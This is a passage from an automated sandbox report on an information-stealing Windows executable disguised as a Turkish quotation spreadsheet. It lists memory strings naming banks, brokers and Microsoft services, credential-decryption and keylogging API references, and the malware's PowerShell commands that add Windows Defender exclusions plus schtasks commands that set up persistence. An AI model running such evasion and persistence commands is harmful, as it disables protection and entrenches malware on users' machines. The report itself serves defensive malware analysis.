Source: OnCgVRIhY.exe, 0000000E.00000002.4521616204.0000000004316000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: www.interactivebrokers.comVMware20,11696428655}
Source: OnCgVRIhY.exe, 0000000E.00000002.4521616204.0000000003FF8000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: secure.bankofamerica.comVMware20,11696428655\|UE
Source: OnCgVRIhY.exe, 0000000E.00000002.4521616204.0000000003FF8000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: www.interactivebrokers.comVMware20,11696428655}
Source: OnCgVRIhY.exe, 0000000E.00000002.4521616204.0000000003FF8000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - EU WestVMware20,11696428655n
Source: OnCgVRIhY.exe, 0000000E.00000002.4521616204.0000000003FF8000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: outlook.office365.comVMware20,11696428655t
Source: OnCgVRIhY.exe, 0000000E.00000002.4521616204.0000000003FF8000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: microsoft.visualstudio.comVMware20,11696428655x
Source: OnCgVRIhY.exe, 0000000E.00000002.4512900088.00000000010DD000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: OnCgVRIhY.exe, 0000000E.00000002.4521616204.0000000003FF8000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Change Transaction PasswordVMware20,11696428655
Source: OnCgVRIhY.exe, 0000000E.00000002.4521616204.0000000003FF8000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: outlook.office.comVMware20,11696428655s
Source: OnCgVRIhY.exe, 0000000E.00000002.4521616204.0000000004316000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Transaction PasswordVMware20,11696428655x
Source: OnCgVRIhY.exe, 0000000E.00000002.4521616204.0000000003FF8000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: www.interactivebrokers.co.inVMware20,11696428655~
Source: OnCgVRIhY.exe, 0000000E.00000002.4521616204.0000000003FF8000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: ms.portal.azure.comVMware20,11696428655
Source: OnCgVRIhY.exe, 0000000E.00000002.4521616204.0000000004316000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: discord.comVMware20,11696428655f
Source: OnCgVRIhY.exe, 0000000E.00000002.4521616204.0000000004316000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: outlook.office.comVMware20,11696428655s
Source: TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe, 00000009.00000002.4513396357.0000000001326000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllv
Source: OnCgVRIhY.exe, 0000000A.00000002.2135022850.00000000072BD000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c
Source: OnCgVRIhY.exe, 0000000E.00000002.4521616204.0000000003FF8000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - NDCDYNVMware20,11696428655z
Source: OnCgVRIhY.exe, 0000000E.00000002.4521616204.0000000004316000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: tasks.office.comVMware20,11696428655o
Source: OnCgVRIhY.exe, 0000000E.00000002.4521616204.0000000003FF8000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: dev.azure.comVMware20,11696428655j
Source: OnCgVRIhY.exe, 0000000E.00000002.4521616204.0000000003FF8000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: netportal.hdfcbank.comVMware20,11696428655
Source: OnCgVRIhY.exe, 0000000E.00000002.4521616204.0000000004316000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Change Transaction PasswordVMware20,11696428655^
Source: OnCgVRIhY.exe, 0000000E.00000002.4521616204.0000000004316000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: AMC password management pageVMware20,11696428655
Source: OnCgVRIhY.exe, 0000000E.00000002.4521616204.0000000004316000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - GDCDYNVMware20,11696428655p
Source: OnCgVRIhY.exe, 0000000E.00000002.4521616204.0000000004316000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696428655
Source: OnCgVRIhY.exe, 0000000E.00000002.4521616204.0000000004316000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: interactivebrokers.comVMware20,11696428655
Source: OnCgVRIhY.exe, 0000000E.00000002.4521616204.0000000004316000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: www.interactivebrokers.co.inVMware20,11696428655~
Source: OnCgVRIhY.exe, 0000000E.00000002.4521616204.0000000004316000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: trackpan.utiitsl.comVMware20,11696428655h
Source: OnCgVRIhY.exe, 0000000E.00000002.4521616204.0000000004316000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - NDCDYNVMware20,11696428655z
Source: OnCgVRIhY.exe, 0000000E.00000002.4521616204.0000000003FF8000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: trackpan.utiitsl.comVMware20,11696428655h
Source: OnCgVRIhY.exe, 0000000E.00000002.4521616204.0000000004316000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: bankofamerica.comVMware20,11696428655x

Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Users\user\AppData\Roaming\OnCgVRIhY.exe

Code function: 14_2_06BF8CC8 LdrInitializeThunk,LdrInitializeThunk,

14_2_06BF8CC8

Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe	Process token adjusted: Debug	Jump to behavior

Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe

Memory allocated: page read and write | page guard

Jump to behavior

HIPS / PFW / Operating System Protection Evasion

.NET source code references suspicious native API functions

Source: 0.2.TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe.3a9c618.4.raw.unpack, COVID19.cs	Reference to suspicious API methods: MapVirtualKey(VKCode, 0u)
Source: 0.2.TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe.3a9c618.4.raw.unpack, FFDecryptor.cs	Reference to suspicious API methods: Marshal.GetDelegateForFunctionPointer(GetProcAddress(hModule, method), typeof(T))
Source: 0.2.TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe.3a9c618.4.raw.unpack, FFDecryptor.cs	Reference to suspicious API methods: hModuleList.Add(LoadLibrary(text21 + "\\mozglue.dll"))

Adds a directory exclusion to Windows Defender

Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe"
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\OnCgVRIhY.exe"
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe"	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\OnCgVRIhY.exe"	Jump to behavior

Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe"	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\OnCgVRIhY.exe"	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe	Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\OnCgVRIhY" /XML "C:\Users\user\AppData\Local\Temp\tmp1B98.tmp"	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe	Process created: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe "C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe"	Jump to behavior
Source: C:\Users\user\AppData\Roaming\OnCgVRIhY.exe	Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\OnCgVRIhY" /XML "C:\Users\user\AppData\Local\Temp\tmp2CAF.tmp"	Jump to behavior
Source: C:\Users\user\AppData\Roaming\OnCgVRIhY.exe	Process created: C:\Users\user\AppData\Roaming\OnCgVRIhY.exe "C:\Users\user\AppData\Roaming\OnCgVRIhY.exe"	Jump to behavior

Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe	Queries volume information: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe	Queries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe	Queries volume information: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
